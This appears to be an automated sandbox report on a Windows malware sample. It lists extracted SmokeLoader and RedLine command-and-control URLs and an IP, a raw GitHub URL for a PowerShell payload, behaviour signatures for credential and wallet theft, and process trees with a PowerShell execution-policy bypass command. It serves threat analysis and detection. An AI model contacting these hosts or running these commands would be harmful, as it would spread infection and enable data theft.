Analysis
-
max time kernel
151s -
max time network
152s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
09-12-2021 20:13
Static task
static1
Behavioral task
behavioral1
Sample
6c3e6325397861164d0818f5d043f822a4ce0aba8a27e5bbcae3e61ce64f4a03.exe
Resource
win10-en-20211208
General
-
Target
6c3e6325397861164d0818f5d043f822a4ce0aba8a27e5bbcae3e61ce64f4a03.exe
-
Size
299KB
-
MD5
083542f4e476ff3aa13a42f86745cc45
-
SHA1
114bc59eb85668cf721b1f7b2aeeae9a0d6c79e8
-
SHA256
6c3e6325397861164d0818f5d043f822a4ce0aba8a27e5bbcae3e61ce64f4a03
-
SHA512
663c8ac7a9aecb429d7b1dc79f4c15ac32c67d6b0764558503e29756df29422163ef652e35b7b511ab6d3c21e4088476c132d1ac2fcd4dc60cc5ea03a9b4af04
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Extracted
smokeloader
2020
http://rcacademy.at/upload/
http://e-lanpengeonline.com/upload/
http://vjcmvz.cn/upload/
http://galala.ru/upload/
http://witra.ru/upload/
Extracted
redline
195.133.47.114:38627
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\CB1C.exe family_redline C:\Users\Admin\AppData\Local\Temp\CB1C.exe family_redline behavioral1/memory/4728-133-0x0000000000930000-0x000000000099C000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
suricata: ET MALWARE Arechclient2 Backdoor CnC Init
suricata: ET MALWARE Arechclient2 Backdoor CnC Init
-
suricata: ET MALWARE ServHelper CnC Inital Checkin
suricata: ET MALWARE ServHelper CnC Inital Checkin
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 101 2848 powershell.exe 103 2848 powershell.exe 104 2848 powershell.exe 105 2848 powershell.exe 107 2848 powershell.exe 109 2848 powershell.exe 111 2848 powershell.exe 113 2848 powershell.exe 115 2848 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 7 IoCs
Processes:
CB1C.exeEC03.exe4501.exe9CF6.exeSoffri.exe.comSoffri.exe.comRegAsm.exepid process 4540 CB1C.exe 4728 EC03.exe 1736 4501.exe 2088 9CF6.exe 68 Soffri.exe.com 4920 Soffri.exe.com 4392 RegAsm.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Deletes itself 1 IoCs
Processes:
pid process 2024 -
Drops startup file 1 IoCs
Processes:
Soffri.exe.comdescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UMMVpGkdto.url Soffri.exe.com -
Loads dropped DLL 2 IoCs
Processes:
pid process 4868 4868 -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
9CF6.exedescription ioc process Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce 9CF6.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" 9CF6.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 120 eth0.me -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
EC03.exepid process 4728 EC03.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
Soffri.exe.comdescription pid process target process PID 4920 set thread context of 4392 4920 Soffri.exe.com RegAsm.exe -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIBDFC.tmp powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIBDBA.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIBDDB.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIBDEB.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_2caqrfal.hof.ps1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIBD6B.tmp powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_khotwnlq.goc.psm1 powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
6c3e6325397861164d0818f5d043f822a4ce0aba8a27e5bbcae3e61ce64f4a03.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 6c3e6325397861164d0818f5d043f822a4ce0aba8a27e5bbcae3e61ce64f4a03.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 6c3e6325397861164d0818f5d043f822a4ce0aba8a27e5bbcae3e61ce64f4a03.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 6c3e6325397861164d0818f5d043f822a4ce0aba8a27e5bbcae3e61ce64f4a03.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag," powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\CurrentLevel = "69632" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1400 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\e1be3f182420a0a0 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c000000 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\PMDisplayName = "Internet [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\LowIcon = "inetcpl.cpl#005422" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName = "Internet" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 103 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 104 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 105 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 107 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
6c3e6325397861164d0818f5d043f822a4ce0aba8a27e5bbcae3e61ce64f4a03.exepid process 3532 6c3e6325397861164d0818f5d043f822a4ce0aba8a27e5bbcae3e61ce64f4a03.exe 3532 6c3e6325397861164d0818f5d043f822a4ce0aba8a27e5bbcae3e61ce64f4a03.exe 2024 2024 2024 2024 2024 2024 2024 2024 2024 2024 2024 2024 2024 2024 2024 2024 2024 2024 2024 2024 2024 2024 2024 2024 2024 2024 2024 2024 2024 2024 2024 2024 2024 2024 2024 2024 2024 2024 2024 2024 2024 2024 2024 2024 2024 2024 2024 2024 2024 2024 2024 2024 2024 2024 2024 2024 2024 2024 2024 2024 2024 2024 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 2024 -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 628 628 -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
6c3e6325397861164d0818f5d043f822a4ce0aba8a27e5bbcae3e61ce64f4a03.exepid process 3532 6c3e6325397861164d0818f5d043f822a4ce0aba8a27e5bbcae3e61ce64f4a03.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
CB1C.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeShutdownPrivilege 2024 Token: SeCreatePagefilePrivilege 2024 Token: SeShutdownPrivilege 2024 Token: SeCreatePagefilePrivilege 2024 Token: SeDebugPrivilege 4540 CB1C.exe Token: SeShutdownPrivilege 2024 Token: SeCreatePagefilePrivilege 2024 Token: SeShutdownPrivilege 2024 Token: SeCreatePagefilePrivilege 2024 Token: SeShutdownPrivilege 2024 Token: SeCreatePagefilePrivilege 2024 Token: SeDebugPrivilege 3876 powershell.exe Token: SeDebugPrivilege 4288 powershell.exe Token: SeIncreaseQuotaPrivilege 4288 powershell.exe Token: SeSecurityPrivilege 4288 powershell.exe Token: SeTakeOwnershipPrivilege 4288 powershell.exe Token: SeLoadDriverPrivilege 4288 powershell.exe Token: SeSystemProfilePrivilege 4288 powershell.exe Token: SeSystemtimePrivilege 4288 powershell.exe Token: SeProfSingleProcessPrivilege 4288 powershell.exe Token: SeIncBasePriorityPrivilege 4288 powershell.exe Token: SeCreatePagefilePrivilege 4288 powershell.exe Token: SeBackupPrivilege 4288 powershell.exe Token: SeRestorePrivilege 4288 powershell.exe Token: SeShutdownPrivilege 4288 powershell.exe Token: SeDebugPrivilege 4288 powershell.exe Token: SeSystemEnvironmentPrivilege 4288 powershell.exe Token: SeRemoteShutdownPrivilege 4288 powershell.exe Token: SeUndockPrivilege 4288 powershell.exe Token: SeManageVolumePrivilege 4288 powershell.exe Token: 33 4288 powershell.exe Token: 34 4288 powershell.exe Token: 35 4288 powershell.exe Token: 36 4288 powershell.exe Token: SeDebugPrivilege 3476 powershell.exe Token: SeIncreaseQuotaPrivilege 3476 powershell.exe Token: SeSecurityPrivilege 3476 powershell.exe Token: SeTakeOwnershipPrivilege 3476 powershell.exe Token: SeLoadDriverPrivilege 3476 powershell.exe Token: SeSystemProfilePrivilege 3476 powershell.exe Token: SeSystemtimePrivilege 3476 powershell.exe Token: SeProfSingleProcessPrivilege 3476 powershell.exe Token: SeIncBasePriorityPrivilege 3476 powershell.exe Token: SeCreatePagefilePrivilege 3476 powershell.exe Token: SeBackupPrivilege 3476 powershell.exe Token: SeRestorePrivilege 3476 powershell.exe Token: SeShutdownPrivilege 3476 powershell.exe Token: SeDebugPrivilege 3476 powershell.exe Token: SeSystemEnvironmentPrivilege 3476 powershell.exe Token: SeRemoteShutdownPrivilege 3476 powershell.exe Token: SeUndockPrivilege 3476 powershell.exe Token: SeManageVolumePrivilege 3476 powershell.exe Token: 33 3476 powershell.exe Token: 34 3476 powershell.exe Token: 35 3476 powershell.exe Token: 36 3476 powershell.exe Token: SeDebugPrivilege 2120 powershell.exe Token: SeIncreaseQuotaPrivilege 2120 powershell.exe Token: SeSecurityPrivilege 2120 powershell.exe Token: SeTakeOwnershipPrivilege 2120 powershell.exe Token: SeLoadDriverPrivilege 2120 powershell.exe Token: SeSystemProfilePrivilege 2120 powershell.exe Token: SeSystemtimePrivilege 2120 powershell.exe Token: SeProfSingleProcessPrivilege 2120 powershell.exe -
Suspicious use of FindShellTrayWindow 16 IoCs
Processes:
Soffri.exe.comSoffri.exe.compid process 2024 68 Soffri.exe.com 2024 2024 68 Soffri.exe.com 68 Soffri.exe.com 2024 2024 4920 Soffri.exe.com 2024 2024 4920 Soffri.exe.com 4920 Soffri.exe.com 2024 2024 2024 -
Suspicious use of SendNotifyMessage 11 IoCs
Processes:
Soffri.exe.comSoffri.exe.compid process 2024 2024 2024 2024 68 Soffri.exe.com 68 Soffri.exe.com 68 Soffri.exe.com 4920 Soffri.exe.com 4920 Soffri.exe.com 4920 Soffri.exe.com 2024 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
4501.exepowershell.execsc.execsc.exe9CF6.execmd.execmd.exeSoffri.exe.comnet.execmd.execmd.exedescription pid process target process PID 2024 wrote to memory of 4540 2024 CB1C.exe PID 2024 wrote to memory of 4540 2024 CB1C.exe PID 2024 wrote to memory of 4540 2024 CB1C.exe PID 2024 wrote to memory of 4728 2024 EC03.exe PID 2024 wrote to memory of 4728 2024 EC03.exe PID 2024 wrote to memory of 4728 2024 EC03.exe PID 2024 wrote to memory of 1736 2024 4501.exe PID 2024 wrote to memory of 1736 2024 4501.exe PID 1736 wrote to memory of 3876 1736 4501.exe powershell.exe PID 1736 wrote to memory of 3876 1736 4501.exe powershell.exe PID 3876 wrote to memory of 792 3876 powershell.exe csc.exe PID 3876 wrote to memory of 792 3876 powershell.exe csc.exe PID 792 wrote to memory of 948 792 csc.exe cvtres.exe PID 792 wrote to memory of 948 792 csc.exe cvtres.exe PID 3876 wrote to memory of 4136 3876 powershell.exe csc.exe PID 3876 wrote to memory of 4136 3876 powershell.exe csc.exe PID 4136 wrote to memory of 3776 4136 csc.exe cvtres.exe PID 4136 wrote to memory of 3776 4136 csc.exe cvtres.exe PID 3876 wrote to memory of 4288 3876 powershell.exe powershell.exe PID 3876 wrote to memory of 4288 3876 powershell.exe powershell.exe PID 3876 wrote to memory of 3476 3876 powershell.exe powershell.exe PID 3876 wrote to memory of 3476 3876 powershell.exe powershell.exe PID 3876 wrote to memory of 2120 3876 powershell.exe powershell.exe PID 3876 wrote to memory of 2120 3876 powershell.exe powershell.exe PID 2024 wrote to memory of 2088 2024 9CF6.exe PID 2024 wrote to memory of 2088 2024 9CF6.exe PID 2024 wrote to memory of 2088 2024 9CF6.exe PID 2088 wrote to memory of 4148 2088 9CF6.exe expand.exe PID 2088 wrote to memory of 4148 2088 9CF6.exe expand.exe PID 2088 wrote to memory of 4148 2088 9CF6.exe expand.exe PID 2088 wrote to memory of 4652 2088 9CF6.exe cmd.exe PID 2088 wrote to memory of 4652 2088 9CF6.exe cmd.exe PID 2088 wrote to memory of 4652 2088 9CF6.exe cmd.exe PID 4652 wrote to memory of 4680 4652 cmd.exe cmd.exe PID 4652 wrote to memory of 4680 4652 cmd.exe cmd.exe PID 4652 wrote to memory of 4680 4652 cmd.exe cmd.exe PID 4680 wrote to memory of 588 4680 cmd.exe findstr.exe PID 4680 wrote to memory of 588 4680 cmd.exe findstr.exe PID 4680 wrote to memory of 588 4680 cmd.exe findstr.exe PID 4680 wrote to memory of 68 4680 cmd.exe Soffri.exe.com PID 4680 wrote to memory of 68 4680 cmd.exe Soffri.exe.com PID 4680 wrote to memory of 68 4680 cmd.exe Soffri.exe.com PID 4652 wrote to memory of 924 4652 cmd.exe PING.EXE PID 4652 wrote to memory of 924 4652 cmd.exe PING.EXE PID 4652 wrote to memory of 924 4652 cmd.exe PING.EXE PID 68 wrote to memory of 4920 68 Soffri.exe.com Soffri.exe.com PID 68 wrote to memory of 4920 68 Soffri.exe.com Soffri.exe.com PID 68 wrote to memory of 4920 68 Soffri.exe.com Soffri.exe.com PID 3876 wrote to memory of 4864 3876 powershell.exe reg.exe PID 3876 wrote to memory of 4864 3876 powershell.exe reg.exe PID 3876 wrote to memory of 4432 3876 powershell.exe reg.exe PID 3876 wrote to memory of 4432 3876 powershell.exe reg.exe PID 3876 wrote to memory of 4612 3876 powershell.exe reg.exe PID 3876 wrote to memory of 4612 3876 powershell.exe reg.exe PID 3876 wrote to memory of 5116 3876 powershell.exe net.exe PID 3876 wrote to memory of 5116 3876 powershell.exe net.exe PID 5116 wrote to memory of 2644 5116 net.exe net1.exe PID 5116 wrote to memory of 2644 5116 net.exe net1.exe PID 3876 wrote to memory of 2176 3876 powershell.exe cmd.exe PID 3876 wrote to memory of 2176 3876 powershell.exe cmd.exe PID 2176 wrote to memory of 1392 2176 cmd.exe cmd.exe PID 2176 wrote to memory of 1392 2176 cmd.exe cmd.exe PID 1392 wrote to memory of 1340 1392 cmd.exe net.exe PID 1392 wrote to memory of 1340 1392 cmd.exe net.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\6c3e6325397861164d0818f5d043f822a4ce0aba8a27e5bbcae3e61ce64f4a03.exe"C:\Users\Admin\AppData\Local\Temp\6c3e6325397861164d0818f5d043f822a4ce0aba8a27e5bbcae3e61ce64f4a03.exe"1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\CB1C.exeC:\Users\Admin\AppData\Local\Temp\CB1C.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\EC03.exeC:\Users\Admin\AppData\Local\Temp\EC03.exe1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\4501.exeC:\Users\Admin\AppData\Local\Temp\4501.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ibtvx3zm\ibtvx3zm.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5FCA.tmp" "c:\Users\Admin\AppData\Local\Temp\ibtvx3zm\CSCDA4A16889969497293E52CD9306BCD1A.TMP"4⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5ixcgkww\5ixcgkww.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES671D.tmp" "c:\Users\Admin\AppData\Local\Temp\5ixcgkww\CSCB83D55875EFA44CA9F382E8A109C8CB4.TMP"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
